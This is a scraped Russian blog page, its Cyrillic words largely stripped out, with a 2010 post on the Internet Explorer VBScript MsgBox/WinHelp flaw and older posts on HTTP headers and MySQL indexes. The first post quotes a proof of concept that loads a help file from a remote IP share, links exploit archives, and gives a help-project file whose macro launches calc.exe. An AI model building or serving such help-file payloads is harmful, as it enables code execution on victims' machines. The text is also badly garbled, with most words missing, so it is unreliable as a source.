, 03 2010 . 10:06
+
IE VBScript. , :
http://habrahabr.ru/blogs/infosecurity/86069/ http://focus.ua/tech/103699 , , , .
-
http://www.securitylab.ru/news/391250.php . !
Maurycy Prodeus PoC , VBScript MsgBox()
:
http://www.securitylab.ru/vulnerability/391247.php ,
http://blogs.technet.com/msrc/archive/2010/02/28/i...d-internet-explorer-issue.aspx - ,
http://www.isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt - !
Proof-of-Concept is available here:
http://isec.pl/poc-isec27/
- winhlp32.exe , Calc.exe : big = "\\184.73.14.110\PUBLIC\test.hlp" =\
,
http://www.exploit-db.com/exploits/11615 :
===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================
, - ! ! ?..
:
HelpScribble . .hlp
. ! , , test.hlp. - test.rtf test.hpj. - , :
[OPTIONS]
LCID=0x409 0x0 0x0
COMPRESS=0
[CONFIG]
EF("C:\\WINDOWS\\calc.exe",`',1)
[FILES]
TEST.RTF
[MAP]
21KSYK4 1
-
http://www.stcsig.org/oi/hyperviews/resources/winhelp_faq/whfaq_qa.htm
...
[3.1.8] Can I link to a URL (web site) from a help file? How?
There are a number of DLLs available for launching a web browser and displaying a web page. The DLLs are good when users don't have a default browser specified. If your users are relatively up to date, you can get away with a simple macro:
ExecFile(`http://www.mysite.net/default.html',,0,)
will usually do the trick. Both Netscape and Microsoft browsers will set up the files needed to launch a URL from the command line. The ExecFile macro just takes advantage of this capability. (Hint: From the Start menu, select Run, and then enter a URL. Click OK, and your browser should launch directly to the page you specified.)
...
- http://help.adobe.com/en_US/RoboHelp/Rword/7.0/mer...ELP_ExecFile_WinHelp_macro.htm
Help Workshop automatically converts the ExecFile macro to EF.
! =) .
<a href="https://www.liveinternet.ru/users/neolitebsd/post46815200/">08.08.2007 11:40:00</a><br/>Разгребая логи системы, о запуске которой я писал ранее, решил посмотреть что значат те или иные заголовки. Например, оказалось, что HTTP_UA_CPU = x86 свидетельствует о том, что у пользователя стоит Windows Mobile 5.0 ([url]http://support.microsoft.com/kb/912876[/url]). Также частенько попадаются пользователи, использующие прокси: их внутренний IP сохраняется в HTTP_X_FORWARDED_FOR. Также обнаружились такие странные заголовки, как HTTP_TE и HTTP_COOKIE2...
Что касается первого, то, как оказалось, что аббревиатура в конце обозначает Transfer-Encoding ([url]http://forum.sources.ru/index.php?sh... <a href="https://www.liveinternet.ru/users/neolitebsd/post46815200/">Читать далее...</a>
, 08 2007 . 15:28
+
, , . , , HTTP_UA_CPU = x86 , Windows Mobile 5.0 (
http://support.microsoft.com/kb/912876 ). , : IP HTTP_X_FORWARDED_FOR. , HTTP_TE HTTP_COOKIE2...
, , , Transfer-Encoding (
http://forum.sources.ru/index.php?showtopic=74208&view=findpost&p=530922 ). , -
http://forum.ru-board.com/topic.cgi?forum=31&topic=10293 .
, HTTP_X_FORWARDED_FOR :
http://xpoint.ru/forums/internet/theory/thread/27342.xhtml
http://lists.paco.net/oops-rus/msg.200010.00180.html
http://www.freeproxy.ru/ru/free_proxy/faq/proxy_anonymity.htm
http://doc.dubs.odessa.net/phpdoc/function.getenv.php
Apache (
http://sysoev.ru/mod_realip/ )
http://softoroom.net/topic24165.html
...
<a href="https://www.liveinternet.ru/users/neolitebsd/post46815166/">08.08.2007 9:00:00</a><br/>Вчера, наконец-то, запустил обсчет статистики для ftp сервера. Также написал улучшенный алгоритм хэширования пароля с использованием MD5. Сегодня несколько доработал его. Также вчера открыл для себя способ проверки эффективности использования индексов в мускуле. Собственно, это и являлось причиной высокой нагрузки на тестовом сервере - постоянное сканирование таблиц в виду отсутствия индексов. Создал необходимые индексы - нагрузка снизилась.... <a href="https://www.liveinternet.ru/users/neolitebsd/post46815166/">Читать далее...</a>
, 08 2007 . 15:28
+
, -, ftp . MD5. . . , - . - .